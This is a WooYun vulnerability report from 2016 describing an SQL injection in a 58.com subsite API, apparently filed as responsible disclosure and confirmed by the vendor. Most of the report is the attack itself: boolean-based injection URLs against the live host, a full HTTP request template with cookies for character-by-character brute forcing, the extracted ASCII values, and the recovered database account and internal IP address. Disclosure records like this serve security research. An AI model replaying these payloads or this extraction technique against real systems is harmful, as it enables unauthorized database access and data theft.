当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167159

漏洞标题:58同城某分站存在SQL注入

相关厂商:58同城

漏洞作者: 浮萍

提交时间:2016-01-04 11:37

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-04: 细节已通知厂商并且等待厂商处理中
2016-01-04: 厂商已经确认,细节仅向厂商公开
2016-01-14: 细节向核心白帽子及相关领域专家公开
2016-01-24: 细节向普通白帽子公开
2016-02-03: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

修复不当

详细说明:

WooYun: 58到家一处SQL注入漏洞

http://jzt2.58.com/api/guest/v21/vip/info?cityid=358164604%20or%201=1&lat=22.6204214&lng=114.0728613&r=-1820211705



http://jzt2.58.com/api/guest/v21/vip/info?cityid=358164604%20or%201=2&lat=22.6204214&lng=114.0728613&r=-1820211705



http://jzt2.58.com/api/guest/v21/vip/info?cityid=358164604 or length(user())=28&lat=22.6204214&lng=114.0728613&r=-1820211705



长度28

漏洞证明:

使用ascii
ascii(mid(lower(user()),%s,1))=%s

GET /api/guest/v21/vip/info?cityid=358164604%20or%20ascii(mid(lower(user()),§1§,1))%20=§101§%20&lat=22.6204214&lng=114.0728613&r=-1820211705 HTTP/1.1
Host: jzt2.58.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: id58=9qbh61Zn5kiPetPUF7p0hg==; city=zz; 58home=zz; 58tj_uuid=61765164-deec-41c5-b506-7749ea30e4f9; new_uv=2; als=0; bj58_new_uv=1; bj58_id58s="UW9qdlRxakF4RmVoMDE0MQ=="; myfeet_tooltip=end; mcity=zz; td_cookie=150435839
Connection: keep-alive


第一位变体为1-28数字
第二位为abcdefghijklmnopqrstuvwxyz0123456789@_.的ascii值

Snap149.jpg


重放选项
匹配设置648789519985946624
变体条件丢弃 匹配648789519985946624 舍弃变体1

Snap156.jpg


结果

Snap158.jpg


1 101
2 109
3 99
4 108
5 111
6 116
7 116
8 101
9 114
10 121
11 95
12 114
13 119
14 95
15 100
16 106
17 64
18 49
19 48
20 46
21 57
22 46
23 50
24 48
25 46
26 49
27 56
28 57


数据库emclottery_rw_dj@10.9.20.189
最后两位会变化

http://jzt2.58.com//api/guest/v21/vip/info?cityid=358164604%20or%20ascii%28mid%28lower%28user%28%29%29,27,1%29%29=55%20&lat=22.6204214&lng=114.0728613&r=-1820211705

修复方案:

版权声明:转载请注明来源 浮萍@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-04 11:55

厂商回复:

多谢对58安全的关注,已反馈给到家的同学

最新状态:

暂无